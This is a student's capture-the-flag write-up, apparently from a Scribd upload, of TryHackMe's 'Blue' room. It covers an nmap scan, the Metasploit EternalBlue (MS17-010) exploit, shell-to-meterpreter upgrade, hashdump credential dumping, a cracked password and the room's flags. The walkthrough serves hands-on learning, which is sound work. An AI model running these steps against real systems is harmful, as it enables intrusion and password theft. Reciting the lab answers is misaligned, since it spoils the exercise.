Scribd
Upload
23 views

System H Acking

hashing

Uploaded by

SRINATH.S
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
23 views

System H Acking

hashing

Uploaded by

SRINATH.S
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 28

CHAPTER TITLE: System Hacking

TOPIC: System Hacking ASSIGNMENT: 12

DATE: 14-06-2024 MARKS: 100

NAME: SRINATH S COLLEGE: KCE

System Hacking

1.Tasks:

Hack the Blue machine using Metasploit framework and submit a detailed
report here.

Blue
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

>>hack to blue machine problem in the tryhackme

>>first we need to join the room

>>then start the machine

>>start the attack box

>>by starting the machine we can get the targeted IP address

>>we are using nmap tool to solve the problem

>>there are five task that we need to complete in this process

>>Recon >>Gain Access >>Escalate >>Cracking>>Final Flag


>>start the machine->your machine is initializing

>>Scan and learn what exploit this machine is vulnerable to. Please note that this machine does
not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to
be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals
will likely get very little out of this room beyond basic practice as the process here is meant to
be beginner-focused.

>>Target machine information display the ip address


>>the displayed ip address is 10.10.193.240

>>open tool nmap

>>scan the nmap

>>using command nmap –sSV 10.10.193.240

>>enter nmap -sC -sV 10


>> Scan the machine. (If you are unsure how to tackle this, I recommend checking out the
Nmap room)

>> How many ports are open with a port number under 1000?
>>after scan the nmap it will show the port number in that we need to how many ports are
below 1000

>>in our report after scanning the nmap we get 3 port which is under 1000

>>What is this machine vulnerable to? ms17-010

>>Exploit the machine and gain a foothold.


>>Start Metasploit

>>enter msfconsole

>>search ms17-010

>>Find the exploitation code we will run against the machine. What is the full path of the code?

>>exploit/windows/smb/ms17_010_eternlblue
>>enter use 0

>>enter show target to see the target list

>>set target as 1 so enter set target 1

>>enter show options


>>set RHOST 10.10.193.240

>>set LHOST 10.10.77.166

>>An exploit executes a sequence of commands that target a specific vulnerability found in a
system or application to provide the attacker with access to the system. >>enter exploit
>>search shell_to_meterpreter

>>enter use 0 and enter show options

>>set session as 1 so enter command set session 1


>>and enter run

>>after running session 1 enter sessions –i 2

>>enter shell
>>after process and channel created enter cntrl+z ->y

>>enter command ps to see the process list

>>process list
>>To do migrate enter migrate command
enter hashdump to get the encrypted data to crack the password

>>copy the data

>>we have used hashes website to get password from encrypted data >>enter

submit
>>

>>we have get the password

Show options and set the one required value. What is the name of this value? >>one

the required value is RHOSTS


>>Escalate

>>If you haven't already, background the previously gained shell (CTRL + Z). Research online how
to convert a shell to meterpreter shell in metasploit. What is the name of the post module we
will use?

>>post/multi/manage/shell_to_meterpreter
>>

>>Select this (use MODULE_PATH). Show options, what option are we required to change?

>>SESSION

Set the required option, you may need to list all of the sessions to find your target here.
>>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the
one you just wrote down in the previous step. This may take several attempts, migrating
processes is not very stable. If this fails, you may need to re-run the conversion process or
reboot the machine and start once again. If this happens, try a different process next time.
>>
>>Cracking

>>by using hashdump we get the encrypted data

>>Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of
the passwords on the machine as long as we have the correct privileges to do so. What is the
name of the non-default user?

>>Jon

>>the cracked data


>>Copy this password hash to a file and research how to crack it. What is the cracked password?
------->>alqfna22

>>password successfully cracked

>>enter command shell

>>cnrl+z->y
>>The pwd command writes to standard output the full path name of your current directory
(from the root directory)

>>enter pwd command

>>enter cd ..

>>Displays directory of files and directories stored on disk. In addition to files and directories,
DIR also displays both the volume name and amount of free storage space on the disk (if there
are files stored in the current directory).

>>enter dir
>>after enter the dir command it will show to list of names

>>first we have to see the flag1.txt


>>so entercat flag1.txt

>>enter shell
>>enter dir *flag* /s /b command

>>it will show the config path of flag2.txt

>>enter type C:\Windows\System32\config\flag2.txt

>>enter type C:\Users\Jon\Documents\flag3.txt


>>Flag1? This flag can be found at the system root.

>>flag{access_the_machine}
>>Flag2? This flag can be found at the location where passwords are stored within Windows.

>>flag{sam_database_elevated_access}

>>flag3? This flag can be found in an excellent location to loot. After all, Administrators usually
have pretty interesting things saved.

>>flag{admin_documents_can_be_valuable}

>>room is completed

You might also like